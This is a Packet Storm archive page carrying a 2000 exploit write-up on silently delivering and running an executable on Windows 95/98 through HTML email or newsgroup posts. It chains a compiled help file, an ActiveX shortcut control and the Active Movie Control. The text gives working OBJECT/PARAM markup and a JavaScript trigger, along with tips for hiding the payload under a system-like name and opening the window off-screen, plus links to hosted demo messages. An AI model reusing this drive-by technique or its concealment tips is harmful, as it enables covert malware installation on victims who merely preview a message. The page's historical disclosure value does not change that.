what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

silent.delivery.txt

silent.delivery.txt
Posted May 14, 2000

Silent delivery and installation of an executable on a target Windows computer is possible by combining some bugs. No client input other than opening an email or newsgroup post is neceassary, making the possibilities endless. The key component is from Georgi Guninski, the wordpad overflow. An ActiveX control does the rest. Exploit code included.

tags | exploit, overflow, activex
systems | windows
SHA-256 | 007f9308b3ece160e58c992cce562deeca8b829f5e860c221e1cc845b05f041a

silent.delivery.txt

Change Mirror Download
Saturday, May 13, 2000

MICROSOFT SECURITY FLAW?

Silent delivery and installation of an executable on a target computer. No
client input other than opening an email or newsgroup post.

1. Using the following this can be accomplished with the default
installation of Windows 95 and 98 and Internet Explorer 5 browsers and
accompanying mail/news clients

2. The key component from Georgi Guninski

http://www.nat.bg/~joro/wordpad-desc.html

3. Secondary component comprises a pre-installed ActiveX control directly
from Microsoft. This control and a variety of similar demonstrations have
been shown to Microsoft over 18 months ago

What to do:

A

(a) Manufacture a *.chm file. The following kit from Microsoft is free and
very easy to use Microsoft=AE HTML Help:

http://msdn.microsoft.com/library/tools/htmlhelp/wkshp/download.htm

(b) Construct a new *.chm file inputting the ActiveX link control as
follows:

<OBJECT id=3DAA classid=3D"clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"
width=3D100 height=3D100>
<PARAM name=3D"Command" value=3D"ShortCut">
<PARAM name=3D"Button" value=3D"Bitmap:shortcut">
<PARAM name=3D"Item1" value=3D",C:\WINDOWS\TEMP\MALWARE.exe,">
<PARAM name=3D"Item2" value=3D"273,1,1">
</OBJECT>

<SCRIPT>

AA.Click();
</SCRIPT>

(c) The control itself is quite sensitive to manipulation, the above
represents the bare minimum to run.

(d) Input the path of the executable you intend to run as in PARAM
name=3D"Item1" above. In order to disguise the running of the executable it=
is
suggested to not to give it a silly name, rather something that is familiar
to the operating system e.g. microsoftagent.exe etc.

(e) While constructing the *.chm, it is possible to both minimise and offse=
t
the location of the *.chm file once opened. For example while under
construction you can set the size of the help window and its location -
using the auto resizer in Microsoft=AE HTML Help, drag the sizer to the
smallest possible size. Although setting the size requires clicking OK
inside the autosizer, dragging to minimal size and hitting ENTER will
register the setting. Secondly offset the location of the file by inputting
say 2000 , 2000, this should suffice in it opening off-screen on any size
monitor.

(f) Once you have compiled the *.chm test its functionality by placing the
executable in your temp file and open the *.chm - it should run the
executable.

Now how do we place this on the target computer?

B.

(a) Simply by opening an email message or newsgroup post. The client does
nothing. They receive an email open it or read a newsgroup post and that i=
s
all. Both the *.exe and *.chm are transferred silently and immediately to
the temp folder once the email or newsgroup post is open.

How so?

(b) It is possible to embed almost anything in both html email and html
news. Current versions of Outlook Express 5 inspect what is being embedded
is in fact the correct file e.g. <img src=3D"abc.doc"> will not embed becau=
se
a *.doc is obviously not an image file. Internet Explorer 4 and accompanyin=
g
Outlook Express 4 does allow for this, similarly Netscape Messenger also
allows for this. Nevertheless, through proprietary JavaScript and VBscript,
it is possible to deliver an intact file to the target computer's temp
folder, however with a file name given by the computer e.g. 000321.doc. Thi=
s
does not serve the purpose of running the *.chm with the file name explicit
as above.

(c) The Microsoft Active Movie Control (AMC) pre-registered and
pre-installed on all Internet Explorer 5 computers does. The very simple
scripting to do this is as follows:

<OBJECT classid=3Dclsid:05589FA1-C356-11CE-BF01-00AA0055595A height=3D1
style=3D"DISPLAY: none" width=3D1>

<PARAM NAME=3D"Filename" VALUE=3D"C:\WINDOWS\DESKTOP\MALWARE.chm">

<OBJECT classid=3Dclsid:05589FA1-C356-11CE-BF01-00AA0055595A height=3D1
style=3D"DISPLAY: none" width=3D1>

<PARAM NAME=3D"Filename" VALUE=3D"C:\WINDOWS\DESKTOP\MALWARE.exe">

(d) This control too is very sensitive and the complete path must be
inserted in order for it to embed in the html email message or html news
post.

(e) Finally, in the body of the html email or html news post the following
simple JavaScript is required to set off everything:

<SCRIPT>

setTimeout('window.showHelp("c:/windows/temp/MALWARE.chm");',15000);

</SCRIPT>

Sufficient delay must be allowed for the news post or email message and
transference of both the executable and *.chm files to be delivered to the
target computers temp file before execution is called.

What will happen?

When the email or news post is opened, the embedded *.chm and *.exe will
automatically and silently be transferred to the client temp folder, intact
and with the given names. Default locations on all machines calls for the
temp folder to be at C:\windows\temp. The AMC control, will deposit the two
files to wherever the temp folder is located, if you have changed the
location, these two files will still be delivered there, however because th=
e
*.chm file is constructed to seek out the *.exe in the default location, it
will fail. Likewise so will the script in the html email message or news
post. Hence, this will only work on default OS installs.

Once the news post or email has been opened or even previewed via Outlook o=
r
Outlook Express preview pane, the two files are delivered to the temp
folder, sufficient time elapses when the script in the html message calls
the *.chm which opens silently and minimised in the task bar (because we
have instructed it to open at the minimum size and off-set 2000, 2000), onc=
e
opened it, the ActiveX link control in it, runs the executable.

Everything is instantaneous, no need for a reboot and no need for user
interaction other than opening the email (or simply previewing it) or the
newsgroup post. Needless to say once the executable is running, the damage
is done. And no Windows Scripting Host (WSH) involved.

The only solution is to relocate the temp folder and/or set scripting and
ActiveX controls to the highest possible settings. The default settings do
not ask for permission.

Below represents a working example. The executable incorporated is a
harmless joke program. In order to run it, save the entire example as eithe=
r
*.nws or *.eml and click on it:

note: 1/ on high speed machines and i-connections with IE5, clicking the
links below will allow for viewing of these news and mail files in the
browser (technically known as mhtml), with the same effect. Slower machines
and i-connections might want to save to disk and open from there.
Additionally saving to disk and opening will allow for viewing in the mail
or news client.

note: 2/ it is not necessary to run this through html mail or news, applyin=
g
all the above directly on the web results in the same.

Right-click and save to desktop

Mail: http://members.xoom.com/malware/help.eml 89KB

News: http://members.xoom.com/malware/help.nws 89KB




Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    48 Files
  • 20
    Sep 20th
    36 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    38 Files
  • 24
    Sep 24th
    65 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close